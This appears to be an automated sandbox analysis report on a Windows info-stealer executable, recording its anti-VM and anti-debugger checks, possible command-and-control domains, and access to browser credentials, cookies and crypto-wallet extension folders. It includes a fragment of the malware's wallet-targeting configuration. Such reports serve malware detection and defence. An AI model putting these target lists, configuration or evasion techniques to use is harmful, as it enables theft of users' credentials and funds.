Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 54009EA second address: 54009F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 322Eh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 54009F3 second address: 5400A5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F61286B7182h 0x00000009 and ecx, 5791D878h 0x0000000f jmp 00007F61286B717Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ax, dx 0x0000001f pushfd 0x00000020 jmp 00007F61286B7183h 0x00000025 sbb esi, 6F59BCEEh 0x0000002b jmp 00007F61286B7189h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 5400A5A second address: 5400A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D90Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 5400C22 second address: 5400C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 5400C26 second address: 5400C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 5400C2C second address: 5400C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F61286B717Ah 0x00000009 sub ah, 00000018h 0x0000000c jmp 00007F61286B717Bh 0x00000011 popfd 0x00000012 mov cx, 2FCFh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F61286B7181h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Special instruction interceptor: First address: AF8AAB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Special instruction interceptor: First address: C9B346 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Special instruction interceptor: First address: D2B5FA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe TID: 1424 Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe TID: 1836 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: cFLK1CiiNK.exe, 00000000.00000002.1481403617.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: cFLK1CiiNK.exe, 00000000.00000003.1424449031.0000000001746000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424471508.000000000169B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Welcome to the wnlplqemuadyyma
Source: cFLK1CiiNK.exe, 00000000.00000003.1424449031.0000000001746000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424471508.000000000169B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]Welcome to the wnlplqemuadyyma
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: cFLK1CiiNK.exe, 00000000.00000003.1400622014.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482281782.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480612636.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1324894763.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D90000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: cFLK1CiiNK.exe, 00000000.00000003.1400622014.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482281782.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480612636.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1324894763.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWc
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: cFLK1CiiNK.exe, 00000000.00000002.1481403617.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: cFLK1CiiNK.exe, 00000000.00000002.1482208142.0000000001687000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480191552.0000000001687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(+m
                Source: cFLK1CiiNK.exe, 00000000.00000003.1350693519.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: NTICE
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: SICE
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: SIWVID
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: hummskitnj.buzz
Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: cashfuzysao.buzz
Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: appliacnesot.buzz
Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: screwamusresz.buzz
Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: inherineau.buzz
Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scentniej.buzz
Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: rebuildeso.buzz
Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: prisonyfork.buzz
Source: cFLK1CiiNK.exe, 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mindhandru.buzz
Source: cFLK1CiiNK.exe, 00000000.00000002.1481403617.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: YProgram Manager
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: cFLK1CiiNK.exe, cFLK1CiiNK.exe, 00000000.00000003.1424777027.0000000005D42000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482281782.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480191552.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424471508.00000000016AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: cFLK1CiiNK.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: cFLK1CiiNK.exe String found in binary or memory: Wallets/Electrum
Source: cFLK1CiiNK.exe String found in binary or memory: Wallets/ElectronCash
Source: cFLK1CiiNK.exe String found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
Source: cFLK1CiiNK.exe, 00000000.00000003.1442617492.000000000171F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
Source: cFLK1CiiNK.exe String found in binary or memory: Wallets/Exodus
Source: cFLK1CiiNK.exe String found in binary or memory: %appdata%\Ethereum
Source: cFLK1CiiNK.exe, 00000000.00000003.1400622014.000000000169B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: cFLK1CiiNK.exe String found in binary or memory: keystore
Source: cFLK1CiiNK.exe, 00000000.00000003.1400622014.00000000016E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets\S
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
